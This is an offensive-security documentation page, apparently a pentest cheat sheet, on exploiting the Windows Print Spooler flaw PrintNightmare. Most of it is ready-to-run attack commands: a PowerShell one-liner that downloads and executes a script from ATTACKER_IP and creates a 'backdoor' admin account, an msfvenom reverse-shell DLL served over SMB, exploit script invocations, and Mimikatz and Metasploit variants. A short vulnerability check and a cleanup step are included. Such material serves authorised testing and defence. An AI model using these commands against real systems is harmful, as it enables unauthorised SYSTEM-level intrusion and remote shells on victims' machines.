> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# PrintNightmare

> CVE-2021-1675 / CVE-2021-34527: local and remote privilege escalation via Windows Print Spooler.

## Overview

PrintNightmare exploits the Windows Print Spooler service to achieve LPE (Local Privilege Escalation) or RCE (Remote Code Execution) by loading a malicious DLL as SYSTEM.

| CVE            | Type | Impact                          |
| -------------- | ---- | ------------------------------- |
| CVE-2021-1675  | LPE  | Local user → SYSTEM             |
| CVE-2021-34527 | RCE  | Remote code execution as SYSTEM |

### Check if Vulnerable

Print Spooler running:

```cmd theme={"dark"}
sc query spooler
```

```powershell theme={"dark"}
Get-Service -Name Spooler
```

Missing patch:

```cmd theme={"dark"}
wmic qfe | findstr "KB5003690 KB5003695 KB5003697"
```

If no results → vulnerable.

***

## Local Privilege Escalation (LPE)

### Using PowerShell (CVE-2021-1675)

```powershell theme={"dark"}
IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/CVE-2021-1675.ps1')
Invoke-Nightmare -NewUser "backdoor" -NewPassword "P@ssw0rd123!" -DriverName "PrintIt"
```

Verifies by adding local admin. Then:

```cmd theme={"dark"}
net localgroup administrators
runas /user:backdoor cmd
```

### GitHub

```bash theme={"dark"}
https://github.com/calebstewart/CVE-2021-1675
```

***

## Remote Code Execution (RCE)

### Step 1 — Create Malicious DLL

```bash theme={"dark"}
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f dll -o evil.dll
```

### Step 2 — Host DLL on SMB Share

```bash theme={"dark"}
impacket-smbserver share . -smb2support
```

### Step 3 — Exploit

```bash theme={"dark"}
# cube0x0's exploit
python3 CVE-2021-1675.py DOMAIN/user:password@TARGET '\\ATTACKER_IP\share\evil.dll'
```

```bash theme={"dark"}
# Using impacket
https://github.com/cube0x0/CVE-2021-1675
```

### Step 4 — Catch Shell

```bash theme={"dark"}
nc -lvnp 4444
```

***

## Via Mimikatz

```
misc::printnightmare /library:\\ATTACKER_IP\share\evil.dll /server:TARGET
```

Local:

```
misc::printnightmare /library:C:\Temp\evil.dll
```

***

## Metasploit

```bash theme={"dark"}
use exploit/windows/dcerpc/CVE_2021_1675_printnightmare
set RHOSTS TARGET
set SMBUser user
set SMBPass password
set SRVHOST ATTACKER_IP
run
```

***

## Post-Exploitation Cleanup

```cmd theme={"dark"}
# Remove added driver (/dd deletes a driver by model; /dl /n only deletes a printer device)
rundll32 printui.dll,PrintUIEntry /dd /m "PrintIt" /q
```

<Warning>
  PrintNightmare can crash the Print Spooler service. In a real engagement, coordinate with the client before exploiting.
</Warning>
